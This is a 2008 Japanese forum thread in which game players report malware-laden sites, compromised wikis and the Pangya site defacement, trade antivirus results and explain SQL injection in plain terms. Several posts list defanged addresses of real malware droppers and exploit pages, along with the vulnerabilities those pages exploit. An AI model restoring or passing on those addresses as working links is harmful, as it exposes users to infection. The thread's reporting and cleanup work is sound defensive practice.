相手が特定できなくて捜査は終った。担当が帰ってきたら掛けなおさせる
と言われたのですがこの先復旧にこぎつけることは出来るのでしょうか・・
前回も不正アクセスがあったことだけでも証明して欲しいことを伝えたら
調査しないとわからないけど難しいねえ・・と言われたのですが・・

199 名前:(○口○*)さん:08/07/04 12:48 ID:ycqmywuj0
退いたら負け

200 名前:(○口○*)さん:08/07/04 13:10 ID:R2255C//0
最後まで貫き通す意志がなければ負け犬…じゃなかった泣き寝入り

201 名前:(○口○*)さん:08/07/04 13:25 ID:o3NhEPHS0
RO卒業おめでとうございます。

202 名前:(○口○*)さん:08/07/04 15:44 ID:CPKTAaDe0
>>192
ファイル名を間違えてないですか?
「.htaccess」と最初にドットが無いと機能しないし、
「.htaccess」自体が使えない鯖もあるのでご注意ください

未実装情報Wikiにある.htaccessのサンプル
ttp://future.sgv417.jp/download/conf/htaccess.txt

203 名前:(○口○*)さん:08/07/04 16:08 ID:uPebc1qO0
>>190
盗聴だけの話ならそうなんだけど。

>2005年には不正アクセス事件の犯人が他人の無線LANを無断で
>使用していたという事例や、2008年6月には他人の無線LANを
>無断で使用してインターネットの掲示板に脅迫文書を書き込んだ
>高校生が書類送検された事件などが発生している

つまり回線ただ乗りが問題で、なにがぶら下がってるかは関係ない。
PSPはWPA-PSKに対応してるからWEP使わなければいい話なんだけどね。

ところでNDSなんかでどうしてもWEPがいる場合なんかでも
SSID変更+ステルスにすれば、解決ではないにせよずいぶん
マシになりそうな気がする。

204 名前:192:08/07/04 17:00 ID:z3DL5to50
鯖はxrea。

.htaccessに自分のホスト名を同じように書き込んだら 403 で
閲覧不可になった(アクセスログも403)ので、正常動作は
してると思う。

一応 61.185.0.0/16 も deny 設定して様子見中。

205 名前:(○口○*)さん:08/07/04 17:17 ID:oD6xMf8n0
> 61■206■185■61■broad■xa■sn■dynamic■163data■com■cn

逆引きのみで正引きの設定がされてないせい。
IPアドレスで弾くしかない。

206 名前:(○口○*)さん:08/07/04 17:25 ID:R2255C//0
>一応 61.185.0.0/16 も deny 設定して様子見中。
その辺まで分かっているなら、IPアドレスをブロック単位で
加えていった方がいいかもね。

207 名前:192:08/07/04 22:04 ID:z3DL5to50
あー、そういう事だったのか
全く気付いてなかった……

whois見たら、この7/11で切れるみたいだ>163data

>Whois Record
>Domain Name: 163data■com■cn
>ROID: 20070711s10011s23187457-cn
>Domain Status: inactive
>Registrant Organization: 北京三方??网?技?有限公司
>Administrative Email:
>Sponsoring Registrar: 北京中科三方网?技?有限公司
>Registration Date: 2007-07-11 17:04
>Expiration Date: 2008-07-11 17:04

208 名前:(○口○*)さん:08/07/05 04:24 ID:sbJaxucw0
>>198
相手を特定するのはまず無理なので
198がアクセスしていない場所や時間から
アクセスがあったことがはっきりすればいいだけだよね
警察がガンホーと連絡を取っているかが問題なんじゃ?
アカハックの復旧の流れとかもう一回チェックしたほうがいいよ

209 名前:(○口○*)さん:08/07/05 17:59 ID:K+teZp2M0
wikiを見ているとかカスペルスキーがこのアドレスはトロイの木馬を含みますと
警告してきました。 許可する 拒否するの選択肢がありましたがサイトに繋ぐことを拒否するのか、
サイトを表示させないことを許可するのか よくわからず拒否するを選びました。
ウイルスソフトに対する知識があまりないのでこの選択は正しかったのか不安です。
もし間違っていたとしたら、どのような対策をとったらよいでしょうか。

210 名前:(○口○*)さん:08/07/05 18:15 ID:zqAMkE3m0
>>209
選んだ選択としては正しい。
許可というのはセーフティロックを解除するようなもので
選ぶのは「それは誤判定だ」と言い切れるようなときのみ。
自分の判断だけで許可をする状況はまずないと思っていいよ。

ところで「wiki」って具体的にはどのサイト?

211 名前:209です:08/07/05 18:57 ID:K+teZp2M0
そうでしたか。よかったです。返信ありがとうございました。
wikiはラグナロク通り→GVG→surt wiki→gvgギルド詳細→一番上の同盟のところをクリックしたら警告が出ました。
確か ほかの同盟のところでも出たと思います。

212 名前:(○口○*)さん:08/07/05 20:58 ID:QS64Sged0
>>211
覗いて見ましたが、こりゃ酷い。Wiki中の外部リンクがあちこち書き換えられている。
しかもタイムスタンプ変更しないという機能がONなのか "Last-modified: 2008-03-25 (火) 01:00:00 (102d)"
とかだからもしかするとすっごい前からこうなのかも。
多少ならリバートしようかと思ったけど、これじゃ洒落にならぬ。管理人さんがROから離れてなんとやらとか有りますが
管理人権限を発揮して何とかするしかないと思うなぁ。

213 名前:(○口○*)さん:08/07/05 21:02 ID:UMDlS9us0
>>211
命拾いしたねw

214 名前:209です:08/07/05 23:28 ID:/aStHOh90
そんなに酷くなっていたのですか・・
皆さんも気をつけてください。

215 名前:(○口○*)さん:08/07/06 00:18 ID:Qc2+AGoD0
横の連繋が取れている職Wikiはともかく、GvGWikiはLydiaとOdin以外は避けた方が無難。
この2つも、連絡会所属ということでの担保だけだし。
共通InterWikiNameから鯖Wiki関連がばっさり切り捨てられたことからも、このあたりは自明かと。

216 名前:(○口○*)さん:08/07/06 00:37 ID:4FVXufUE0
攻城戦Wikiは、放置・荒れ放題のところが多いですよね…。

きっちり閉鎖宣言して閉じられたところは、ごくまれ…

217 名前:(○口○*)さん:08/07/06 01:44 ID:GiUvFO+60
>>215
Lidiaは未実装の人がやってるから問題ないと思う

Odinはゆる〜りだがGv板が(管理の面で)生きてるし管理はされてる方だと思う

218 名前:(○口○*)さん:08/07/06 01:45 ID:GiUvFO+60
スペルミスった。orz

219 名前:(○口○*)さん:08/07/06 06:04 ID:ezYvKDcu0
surt wikiに仕掛けられてたアドレス

www■skywebsv■com/Blog/
www■teamerblog■com/blog/
www■gamehanbook■com/esports
www■articlelin■com/wiki/
IPだと 61■139■126■91 や 61■139■126■16

他にもあったのかもしれないけど、改竄っぷりが凄すぎて見る気が失せた。
正直、全ページデリった方がいいような気がする。

仕掛けられてたものはFlashの脆弱性やReal Playerの脆弱性、定番のMs06014 とか。
iframeの罠検出を避けるためか、フレームサイズを width=90 height=0 みたいに弄ってる。
毎度のCuteQQ謹製ツールで作られたものっぽい。

Psymeらしいので発動しないとは思うけど、 0733■htm が VT で 5/33 、カスペも素通り。

Flashの罠の huohu5798592■swf はカスペによるとExploit.SWF.Downloader.a。
第一号を見るとは思わなかった。

220 名前:(○口○*)さん:08/07/06 09:45 ID:bOwSFTSo0
>>219
ついでに言うと”GvG詳細”の添付ファイルにはウィルス実行ファイルを置いてるな。

添付ファイルの実行ファイルをLinuxからClamAVでスキャン。
NLK■FC■exe: Trojan.Inject-347 FOUND

>正直、全ページデリった方がいいような気がする。
WikiのTOP見てもゲームから離れたを理由に管理者自ら管理放棄状態と思われるしねぇ。
この手のWikiにありがちな、俺が管理放棄しても利用者が何とかしてくれるしいいや的な利用者まかせともとれる。

リネ資料室の管理者さんは言っていた、管理できなくなったら放置せず中身もきれいさっぱり削除して完全に閉鎖、管理者としての責任であると。

221 名前:(○口○*)さん:08/07/06 10:15 ID:N7fYAo+u0
もうページ消しちゃったら?
有志が新wiki立てることになればデリった差分から復元できることだし。

222 名前:(○口○*)さん:08/07/06 11:36 ID:FugAEIi60
【      気付いた日時          】 昨晩と今(URLを記入しようとして誤って踏んでしまいました)
【不審なアドレスのクリックの有無 】 www■jplineagejp■com■wiki/  2chのスレから踏みました
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 Yes たまに家族が使う程度
【    ツールの使用の有無      】 ?
【  ネットカフェの利用の有無    】 Yes
【     OS    】 Win XP Home SP2
【使用ブラウザ 】 Sleipnir2.62 IEは6
【WindowsUpdateの有無】 自動更新6月20日
【 アンチウイルスソフト 】 F-SecureInternetSecurity2008
【その他のSecurty対策 】 ルータ、Spybotでたまにスキャン
【 ウイルススキャン結果】 検出なし
【スレログやテンプレを読んだか】 Yes
【hosts変更】?
【PeerGuardian2導入】無

【説明】 ネトゲはやっていませんがこちらで知恵をお借りしたく失礼します。
別のウィルス情報質問スレで質問したのですが、レスがつかないため
アカウントハックにより詳しいこちらで知恵を貸して頂けたらと思います。
アカウントハックはゲーム以外のID PASSも変更が必要なのでしょうか。

URLを踏んだらセキュリティソフトでTrojan-Downloader.VBS.Psyme.fb が検出されました。
検疫ができず名前変更処理済で、サポート側からも名前変更処理してあるので大丈夫と回答頂きましたが心配です。
過去スレでWindows Updateをしてあれば大丈夫と見たのですが、自分の履歴では該当のMS06-014を当てた形跡が無くちゃんと当たってるかも心配です。
このパッチが出た後に買ったパソコンで適用されているのかわかりません。

今誤って同じURLを踏んでまた感染してしまい、履歴はTrojan-Downloader.VBS.Psyme.fbとなっていますが
感染メッセージにはPsyme.odとか書いてあった気がします。

223 名前:(○口○*)さん:08/07/06 11:51 ID:ZnCvYEdM0
>アカウントハックはゲーム以外のID PASSも変更が必要なのでしょうか。
mixiなどとの複合型もあるので、発動させた後IDとPASSを入力しているものは
安全な環境から一通り変更するのが望ましい。

>今誤って同じURLを踏んでまた感染してしまい、履歴はTrojan-Downloader.VBS.Psyme.fbとなっていますが
>感染メッセージにはPsyme.odとか書いてあった気がします。
同じアドレスに複数の検体が入っている事や、差し替えが行われており前回と違う名称であることはよくある。

224 名前:(○口○*)さん:08/07/06 13:21 ID:31pfsqYN0
まだハックかどうかもわからないのですが…。
ROのクライアントを立ち上げ、ゲーム起動をクリックしたら
ブラウザ(Sleipnir)が立ち上がり、一気に30くらいのタブが出てきました。
怖くなりブラウザは即終了したので何を読み込んだのかわかりません。
今再起動しもう一度ROを立ち上げると今度は何も出てきませんでした。
発生するまでいろいろなページを見たので詳細は覚えていませんが、ウィルスソフトは
特に何も検知しませんでした。

とりあえず、ROの方はPASS等は入力せずに終了させましたが、
これはアカハックなのでしょうか?
過去にこんな事例はありましたか?
教えてください。

225 名前:(○口○*)さん:08/07/06 13:23 ID:ezYvKDcu0
>221
Wiki使ってるスレがあるなら、そこに一声掛けてからの方がいいと思って
探したが、どこがそうなのか良く分からんかった


>222
www■jplineagejp■com/wiki/
--->www■jplineagejp■com/wiki/jpmm■exe

index.html は VTで25/33、TrendMicroがスルー。
jpmm は VTで27/33、McAfee・NOD32v2・Symantecがスルー。
結果として、普通のアンチウィルスソフトならどちらかを引っかける。

MS06-014 は Microsoftが 2006年に出したWindowsUpdateのパッチの14番目のもので
MDACの脆弱性の修正パッチ。

>【WindowsUpdateの有無】 自動更新6月20日
とあるので、当たってると思われる。
XPのSP3にも含まれてるので、それを当てるって手もある。

罠は結構頻繁に差し替えられてるため、ある時はRO限定であっても、ある時はmixiや
メッセンジャーのPASS抜きも合わさってたりする。
なので>223の言うように、”安全な環境”から、一通り変更した方が無難。

226 名前:(○口○*)さん:08/07/06 14:12 ID:pLlWsFFE0
>>224
そんな何が起動したか分からない、再現もしない、原因もどれか知らないなんて、
雲をつかむような話をされる身にもなってみろ。

227 名前:(○口○*)さん:08/07/06 14:26 ID:GiUvFO+60
>>224

・ウイルスソフトは何を使っている?
 ノートンはアカウントハックウイルスの検知率低いので
 カスペルスキーのオンラインスキャンを試してみるといいかもしれない


ROに反応してるってことなら怪しいのでクリーンインストールがいいんだが。

228 名前:(○口○*)さん:08/07/06 14:26 ID:ZnCvYEdM0
新規に立てられたスレ。もろにアカハックのアドレス。

1 (○口○*)さん 08/07/06 13:36 ID:MmFQw6bL0
ある日の臨時です、メンバーの同意が得られたのでうp。ぼうれい武者がガイコツまおうとノロージョを退...

http://www■makgcat■com/rm■exe

229 名前:224:08/07/06 15:50 ID:31pfsqYN0
>>227
ウィルスソフトはウィルスキラーを使用。
とりあえずカスペでスキャンしてみます。
ありがとう。

>>226
確かにこんな報告じゃ助言も出来ないですね。
当時焦ってしまって訳わからなくなってしまったのが駄目なところでした。
大変申し訳ない。

230 名前:(○口○*)さん:08/07/06 16:06 ID:ZnCvYEdM0
>ウィルスソフトはウィルスキラーを使用。
検索エンジンは、Rising らしいな。

取り敢えず>>224の症状は、ウイルスというよりブラクラを踏んだ時の症状だな。
特定のページを開こうとする奴の誤動作の可能性もあるけど。

231 名前:(○口○*)さん:08/07/06 17:27 ID:ezYvKDcu0
>228
rm■exe Trojan-PSW.Win32.Mapler.ae
VTが落ちてるのか繋がらなかったので、カスペの結果のみ

232 名前:(○口○*)さん:08/07/06 18:00 ID:bOwSFTSo0
>>228
makgcatは今月末で期限切れだから福建人一味も頑張っている模様。

233 名前:222:08/07/06 18:11 ID:qN3XBpTPO
>>223,225
ありがとうございます。
安全な環境からPASSを変更するのが無難という事は
現在のPCはリカバリーするのが前提でしょうか。
バックアップを取る場所がなかったりすぐ出来そうにないので
大丈夫ならこのまま使おうと甘く考えてました。
仕方なく現在のPCでちょっとだけネットも接続しましたが怖くてログインするサイトは行ってません。

以下チラ裏ですが買った時の説明書やCD類(DELLなので少しです)を探したら見つからず…最低です。

234 名前:(○口○*)さん:08/07/06 18:25 ID:bOwSFTSo0
surt wikiの改竄部分の確認できたページのリンクの除去だけしてきた。
見落としあると思うけどね。

235 名前:(○口○*)さん:08/07/06 18:37 ID:g7zWwvcY0
>>231
ttp://www.virustotal.com/analisis/bc868aef092d444cf750a5c958c6b6b0
スルー Norton NOD32

踏んでドロッパがトロイをドロップした後(感染後に検出・駆除できるか? というもの)
ttp://www.virustotal.com/analisis/2906f37a344e746ab9e7e2c29eaccd43
スルー AVG McAfee Norton NOD32

物としてはRO、FFXI、mixiの複合アカハック。

236 名前:(○口○*)さん:08/07/06 23:38 ID:ezYvKDcu0
>234
httpで検索して、明らかに怪しいリンクは消してきた。
更新の衝突があったので、他にもメンテしてる人が居た模様。

しかし中に 23style があったんだが、一体いつから改竄されてたんだ?
ToIndex となってる部分にリンク仕込むとか、芸が細かすぎる……

237 名前:(○口○*)さん:08/07/07 02:00 ID:NJ9tRs7P0
>>234
Surt wikiの設置してあるGamedbの場合、標準でNGワードの設定機能があるんだよね。
ttp://gamedb.info/faq.html#faq17
無論、この項目の編集にはWiki管理者パスワードが必要。

TOPの記述を見ても、後継管理人の募集や、別サイトへの引き継ぎなどの対策も行わずにフェードアウトしたのに近いから、
あまり期待が出来ないのが実状だろう。そのタイムスタンプすら、2007-03-19時点のまま追記が無いし。

検索などで辿り着くなど被害が増える要因は幾らでもあるし、ぼろぼろの攻城戦Wikiは放棄して、GvG集約Wikiを再構築した方が
良いのではないだろうか。
トラフィック問題なども、最盛期と比べたら格段に減少しているので、複数鯖の分を纏めても耐えられるのではなかろうか。
各方面からの被リンクなども新サイトに誘導すれば、検索結果も上位になることによって、旧サイトよりも優先順位が上まわる。

238 名前:(○口○*)さん:08/07/07 12:45 ID:E4iPWSqx0
>>237
言い出しっぺの法則摘要に期待

239 名前:(○口○*)さん:08/07/07 20:14 ID:t9ZIwzug0
www■1ive■net/i.exe
ttp://www.virustotal.com/analisis/39672b907b783b20dd78c9398b24ae7a
スルー avast McAfee NOD32 Norton バスター

んで踏むと↓をダウンロードして実行。
www■1ive■net/oo.exe
ttp://www.virustotal.com/analisis/e6a067ce6983c1dc74c0bf26c43ea9ed
スルー McAfee Norton OneCare バスター

提出します。

240 名前:(○口○*)さん:08/07/08 00:00 ID:7KfWKSc70
パンヤ公式がハッキングされウイルスを仕込まれた様子
現在は駆除されてるけど具体的なことがさっぱり公開されてない

241 名前:(○口○*)さん:08/07/08 00:44 ID:mGb+BUjO0
これか。3日も放置してたのか?

パンヤ
公式サイト緊急メンテナンスの経緯について
ttp://www.pangya.jp/board_notice_view.aspx?seq=1571
7月5日(土)20:30頃より、公式サイトにて一部のページが改ざんされ、
該当ページを閲覧した場合に、悪意のあるサイトへの誘導、
ウィルスに感染する恐れがございました。
そのため、7月7日(月)10:30より公式サイトの緊急メンテナンスを実施し、
改ざん部分の復元および、該当箇所の脆弱性を修正いたしました。

242 名前:(○口○*)さん:08/07/08 05:19 ID:VC3aM1kf0
トロイ:Trojan-Downloader.JS.Agent.ccv
パンヤの公式掲示板見る限り、
ピピン占いのページが改ざんされて、インターネット一時ファイルに上記のウィルスが感染。
で、カスペ以外のウィルス対策ソフトは完璧スルーだったらしい。占いやった人要注意。
ちょっとageておこう。

243 名前:(○口○*)さん:08/07/08 05:26 ID:VC3aM1kf0
ああごめん、ノートンとかでも検出できたらしい。
バスターはダメだったとか・・・

244 名前:(○口○*)さん:08/07/08 05:40 ID:mGb+BUjO0
>>242
公式BBS見てきた。
asslad■com allocbn■mobi
adw95系のボットネットですねぇ。
インチキセキュリティソフトを突っ込むやつ。
最近PlayStation(北米)のサイトもやられた。

245 名前:(○口○*)さん:08/07/08 05:44 ID:zR5CmjSs0
>>241の飛ばされ先。
-> www■allocbn■mobi/ngg■js
--> appdad■com/cgi-bin/index■cgi?ad
後者のアドレスは、短時間に同一RemoteHost?からのアクセスがあった場合に、msn.comにリダイレクトする模様。

246 名前:(○口○*)さん:08/07/08 06:10 ID:mGb+BUjO0
>>245
そこは…面倒です。
単純に書くとドメインaaaとドメインbbbがあった場合、
aaa
→aaa
aaa
→bbb
bbb
→aaa
bbb
→bbb
と全部組み合わせが可能です(飛び先はたぶん5分くらいで切り替わる)。
で、ドメインがほぼ毎日いくつも取得されていたりします
(常時稼動しているのは1ダース程度かと)。
ドメインでググるとぐんにょりします。

247 名前:(○口○*)さん:08/07/08 09:17 ID:BZTh1Am10
バスターはノートンと張り合っているかと思ったら、落ち目になってるねぇ。

248 名前:(○口○*)さん:08/07/08 09:50 ID:exwe+cFa0
FFがすごい勢いでやられています
感染源はここ↓の広告枠の可能性が高いようです(今は広告消えているようですが)
www●ffxiah●com/index●php
現時点ではカスペすり抜けている&検体捕獲できていない模様
FFもやっている人は気をつけてください

(FFXI)●RMT業者による不正アクセスの報告・対策スレッド26●
ttp://changi.2ch.net/test/read.cgi/ogame/1215465339/l50

249 名前:(○口○*)さん:08/07/08 12:09 ID:BZTh1Am10
「マルウェア検体、改ざん報告求む」JPCERT/CCが情報連携訴え
http://internet.watch.impress.co.jp/cda/news/2008/07/07/20173.html

250 名前:(○口○*)さん:08/07/08 16:54 ID:shIC6GriO
一応ノートンだけど、ピピン占いした時に【外部からの攻撃をブロックしました】と出た確かに!

その後カスペオンラインスキャンしたら感染してなかったから大丈夫とみていいのかな?


パンヤひどいよ(´・ω・`)

251 名前:(○口○*)さん:08/07/08 16:58 ID:flq/uzz30
「スカっとゴルフパンヤ」で公式サイト改竄,利用者はウイルスチェックを
ttp://www.4gamer.net/games/014/G001477/20080708009/
とうとう利用者多めのとこがやられたか……FEZとか大丈夫か
我らが癌も対岸の火事じゃないぞ

252 名前:(○口○*)さん:08/07/08 17:05 ID:In7T+b2oO
公式までやられると、もう自衛意識だのなんだのじゃ済まないよなあ。

うちはずーっとバスターで通してたけど、そろそろカスペ様にでも乗り換えるかねえ…

253 名前:(○口○*)さん:08/07/08 17:13 ID:shIC6GriO
公式さえやられる時代とは(ノд<。)゜。

もうRO専用マシーンにするよ

254 名前:(○口○*)さん:08/07/08 17:21 ID:gegUJY8j0
【癌呆】<そこは我々が5年前にねちねちごろごろ通った道だ!

255 名前:(○口○*)さん:08/07/08 17:22 ID:BZTh1Am10
よく見てないけれど、パンヤもSQLインジェクション攻撃なのかな。

サイト運営側(というか制作側)から見てもかなり頭の痛い問題だと思うので、
気をつけておかないとねー。

256 名前:(○口○*)さん:08/07/08 18:41 ID:mGb+BUjO0
>>255
そう。世界中で大暴れしているボットネットです。

257 名前:(○口○*)さん:08/07/08 18:45 ID:7KfWKSc70
事前に防ぐのは難しいと思うから、事後のことは本当にしっかりしてもらいたいね

258 名前:(○口○*)さん:08/07/08 19:02 ID:ssHdwhtR0
ボットネットに関しては一応こんなものもある
ttps://www.ccc.go.jp/index.html

トレンドマイクロなのが微妙だけどw

259 名前:(○口○*)さん:08/07/08 20:50 ID:mGb+BUjO0
>>258
あー、それはだめだわw

260 名前:(○口○*)さん:08/07/08 20:50 ID:7KfWKSc70
パンヤ公式BBSの書き込みみると今までターゲットにされてなかっただけに
認識の甘さが凄すぎる…、本格的に狙われたら相当被害でそう

261 名前:(○口○*)さん:08/07/08 21:08 ID:PkZ0ooP00
SQLインジェクションによるサイト改竄の話はよく聞くが
どのサイトでも起こりうるもになの?

ぶっちゃけて聞けば、各種職Wikiやファンサイト、個人の
Blogでも改竄されるもの?

262 名前:(○口○*)さん:08/07/08 21:17 ID:k2rn10bP0
>>261
SQLインジェクションをすごく簡単に言えば、
ブラウザから(Web鯖上の)スクリプトに渡した文字列データを「そのまま」
データベースに送るような処理があるとアウト。

通常ではありえないような入力が無いかチェックして、きちんと弾いて
やらなければならない。それも全般にわたって。

263 名前:(○口○*)さん:08/07/08 21:31 ID:PkZ0ooP00
ということは、外見上入力フォームがあるサイトは起こりうると
思ってた方がいいのかな

264 名前:(○口○*)さん:08/07/08 21:51 ID:y4/JuezT0
今夜アルケミテンプレを見ていた人は注意されたし
垢ハクの書き換えがあった模様

http://gemma.mmobbs.com/test/read.cgi/ragnarok/1213269500/620

265 名前:(○口○*)さん:08/07/08 22:12 ID:42Fn2kOY0
>>263
それは半分は正解。
SQLインジェクションという攻撃手法はSQL言語を利用したプログラムをターゲットとする。
例えばSQLサーバ(例えばMySQL)を利用したCGI(例えばMovableTypeとかWordpress、MediaWiki)
とかね。

で、職Wiki等で用いられているPukiwikiはSQLサーバを使用してない。データはファイルに
保存される。だからそれらは基本的にSQLインジェクションには関係が無い。
但し、CGI自体に脆弱性が有り、フォームからの不正な入力をきちんと弾けてない場合は
同じく悪さをされる可能性がありうる。こっちは昔っから言われているせいか最近では
あまり聞かないなぁ(フォームメールの脆弱性はよく有るけど)。SQLインジェクションは
それと比べて近年注目されだしたからまだ対策の甘いとこがゴマンと有るんだろうね。

266 名前:(○口○*)さん:08/07/08 22:18 ID:k2rn10bP0
Webサーバで使われるapacheもそうだし、
クライアントで使われるFlash Playerやその他のソフトウェアもそうだし、
もっと言ってしまえばOSもそうなんだけれど、

広く普及しているモノは狙われやすい。
セキュリティホールが見つかったとき、効果的なアタックが可能だしね。

ウイルスも昔は見た目に分かる影響を出すモノが多かった(HDD壊す
だとかパケット出しまくるだとか)、今はこっそり活動することに重きが
置かれているので、検出されない亜種が放置されることもあって危ない。

267 名前:(○口○*)さん:08/07/08 22:58 ID:QEmKKKk00
検出されずにひっそりと活動を続けてるウィルスが、多くの人のPCに潜んでたりしそうだな。

268 名前:(○口○*)さん:08/07/08 23:37 ID:zR5CmjSs0
>>261
極端な話をすれば、癌公式もやられる可能性は0ではない。
いま現在、各種告知などに使われているのはNucleus CMSで、このソフト自体がSQLデーモンを前提としている。
また、XSS脆弱性をfixする為のアップデートも何度となくリリースされたので、それらを適用していないと問題となる。
本当は、具体的な使用ソフト名を出すのはリスクかも知れないが、公式の場合は公然とエラーメッセージをリモートに吐くので
こんなところで書いたところで影響は軽微だろう。

>>265
最近あった例だと、クエストWiki絡みでparaedit.ini.phpにサニタイズ抜けが指摘されていたような。
Wikiクローン本体だけでなく、導入したpluginに穴がある場合もあるから厄介。

269 名前:(○口○*)さん:08/07/09 05:41 ID:+Oi2BnO1O
友達にアカハックされているかもよと言われて、このままで待っててね
色々教えるからと言われて待つこと4時間。眠くて大変なのですが、スレなど読んで親のパソコンからパスワードは変えました。
友達は上がってきません。学校行く準備しないといけないのですが
落ちて大丈夫ですか?
帰ってきたら、ウィルスチェックしたらいいですか?
それともパソコンはつけっぱなしでないとだめですか?
今日はバトンが頭に落ちてきそう(;_;)

270 名前:(○口○*)さん:08/07/09 05:53 ID:eDvbD/uC0
別PCからパスかえたんなら とりあえずはOKかな?
完全にOKとはいえないのでその辺は運だな後は今できることは無いと思う
親のPCはウィルスチェックした?

たぶん友達は難しいこと考えて寝ちゃったんだと思うwwww
そもそも アカハックされてるかもよ じゃなくて
ウィルス踏んでるかもよ?なんじゃないかと
カスペルスキーでチェックかけてみそ?

271 名前:(○口○*)さん:08/07/09 06:04 ID:BmbQ1DIA0
以前の鍵は盗まれたかもしれなくても、新しい鍵に付け替えられたのならとりあえずは大丈夫
帰ってきてからゆっくり対応すればいい
PCを付けっぱなしにする必要はない
ログインしっぱなしにする必要もない

しかし感染の疑われるPCでは対処が終わるまでPass打ち込み(ログイン行為)は出来ないので、
もし今ログインさせたままであるというなら、やっておかなければいけない事があれば済ませておく事
まあゲーム内でのことなんて優先度は低いが

272 名前:(○口○*)さん:08/07/09 06:08 ID:+Oi2BnO1O
お返事ありがとうございます。
心配で眠れませんでした。たまり場で一人でポツンって
していたら悲しくなってしまいました。初めてこのスレを見つけた時は
泣いてしまいました。
親のパソコンはウィルスチェックしませんでした(;_;)
かすぺ?みたいなのをする時間は今はありません。
親に怒られるかもしれませんが
ログアウとしない方が良いですか?

273 名前:(○口○*)さん:08/07/09 06:12 ID:+Oi2BnO1O
またお返事ありがとうございます。
パソコン落として部活に行きます。
怪我しないようにしないと。
また帰ってきたらスレをよくよんでみますね
貴重なアドバイスありがとうございました

274 名前:(○口○*)さん:08/07/09 06:33 ID:T22QPkcw0
月例WUage

重要(4)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-jul.mspx

275 名前:(○口○*)さん:08/07/09 08:14 ID:3fTT1tOw0
KB951748適用すると、ZoneAlarm使用人はネットに繋がらなくなる恐れあり
ZoneAlarm側でまだ対策upされてないのでアップデートは自己責任で

276 名前:(○口○*)さん:08/07/09 09:05 ID:VP51IgiY0
いつか分からないけれどJavaもあぷでとしてる

277 名前:(○口○*)さん:08/07/09 09:09 ID:5cPr6K1D0
福建中華どもはドメイン取得からサイト改竄へシフトしつつあるのか、
ある掲示板でこんな書き込みを見つけた。
-----ここから
900.Lineage EP6&EPU Database 返信 引用

名前:ウルフィナ 日付:7月7日(月) 0時13分
本家サイトのwiki記事です。
更新内容についての説明を書いたのでご覧ください。
hxxp://kanauni.blog.shinobi.jp/


899.〜企画・主催〜 返信 引用

名前:ソウム 日付:7月7日(月) 0時5分
リネ1のアンソロジー同人誌企画。 
現在執筆者様募集中です!
hxxp://kanauni.blog.shinobi.jp/
-----ここまで

このテンプレ記事で、以前からウィルス爆撃をしている。
ちなみにURLは出版社のブログらしい、いわゆる罠ブログではないことを確認。

このことから、パンヤ改竄とほぼ同時期に改竄されていた可能性がある。
8日時点ではソースチェッカーでも手も怪しい部分は見つけられず、直っている模様である。

そろそろ忍者ブログも危なそうだ、ここのブログ持ちは一度パス変更(設定可能な最大文字数で)をしたほうがいいかも。
気をつけてくれよな!

278 名前:(○口○*)さん:08/07/09 09:11 ID:9t5aqmPp0
出来れば.も変換して置いてくれた方がよかった

279 名前:(○口○*)さん:08/07/09 09:26 ID:9wCrbn7l0
>>277
iframe
www■infosueek■com/ff11diary
ソースチェッカーでも7日のキャッシュで出るぞ。

280 名前:(○口○*)さん:08/07/09 09:52 ID:VP51IgiY0
XSSも頭の痛い問題だな。
これを全部弾くと、まず、広告が死ぬし。

281 名前:(○口○*)さん:08/07/09 10:31 ID:cEKOiPhL0
おまえさんがた今日はWindowsUpdateの日ですよ
今月は4件

282 名前:(○口○*)さん:08/07/09 10:36 ID:VP51IgiY0
>>281
>>274

283 名前:(○口○*)さん:08/07/09 10:45 ID:kq3y3zOY0
そこ今もそのコードが埋め込まれてる様に見えるが……
再度埋め込まれたのか、キャッシュの関係で一時的に見えなかったのかは分からんが
今現在、infosueekのiframeがあるぞ

今検体チェック出来る環境じゃないので、見える範囲だけだと
www■infosueek■com/xin/Ms06014tt■htm
www■infosueek■com/xin/Ms06046tt■htm
www■infosueek■com/xin/Yahoott■htm
www■infosueek■com/xin/Ms07004tt■js
定番のMS06014、MS06046(US ASCII)に加えてMS07004(VMLの脆弱性)
Yahooのは分からんが、メッセンジャーの脆弱性か?

何にせよ、危険。

284 名前:(○口○*)さん:08/07/09 11:08 ID:5cPr6K1D0
>>279
>>283

むむ、またお得意のパターンだったか。(kanauni と kanapuri)
最近この手が無かったので引っかかっちゃったぜ、チェッ!
ほんとに忘れたことに使いやがるからたちが悪い。

どっちにしろ罠ブログなのでこれは通報しておくね!
しかしここもライブドア、ヤプログに続いて拠点化する恐れありだな、油断大敵。

285 名前:(○口○*)さん:08/07/09 11:15 ID:3fTT1tOw0
>>275の追記

KB951748入れたら繋がらなくるが、ZoneAlarmのファイヤーウォールの設定から
インターネットゾーンセキュリティの初期設定の高を中に下げたら繋がった
逆に高に戻すと繋がらない、ステルスモードは使用不可な為自己責任で

286 名前:(○口○*)さん:08/07/09 11:43 ID:5cPr6K1D0
と言う訳で件の罠ブログは詳細を含めて忍者運営へ今通報が完了した、お騒がせゴメンよ。

287 名前:(○口○*)さん:08/07/09 12:08 ID:9wCrbn7l0
>>284
錯誤を狙うのは(infosueekもそうだけど)前からなんだから
調査するURIはコピペでいかないと。

288 名前:(○口○*)さん:08/07/09 12:24 ID:9wCrbn7l0
>>283
www■infosueek■com/xin/xia.exe
6月12日製造。約1ヶ月経ってるのでほとんど捕獲できるんじゃないかな。

289 名前:(○口○*)さん:08/07/09 12:29 ID:wHFxOIvg0
悪質化が進んでるな
そういえば探し物をしてるときのことをちら裏程度のメモだけど公開

http://www■hozen■org/bbs/34/13100/
にアクセスしたとたんカスペさんが叫んだ訳ですよ。

ちなみに中身
─→http://www■gamehanbook■com/esports/
──→http://www■gamemmobbs■com/esports/Ms06014.htm

カスペさんの履歴にある(多分これがらみのアドレス)
http://www■megaretic■org 
が何故か登録者情報も何も存在しない whois掛けても情報なし


ちなみにウイルスは7/6にViruslist JPに登録されている
ウイルス名称 Exploit.HTML.Mht

290 名前:(○口○*)さん:08/07/09 12:35 ID:wHFxOIvg0
因みにソースチェッカーを見ても現在
http://www■hozen■org/bbs/34/13100/
にウイルスが仕込まれてるとかの問題はないことを付け加えておきます

291 名前:(○口○*)さん:08/07/09 12:41 ID:wHFxOIvg0
しかし未だにカスペさんが叫ぶな・・・
未知の何かが仕込まれてるのか?

292 名前:(○口○*)さん:08/07/09 12:52 ID:5cPr6K1D0
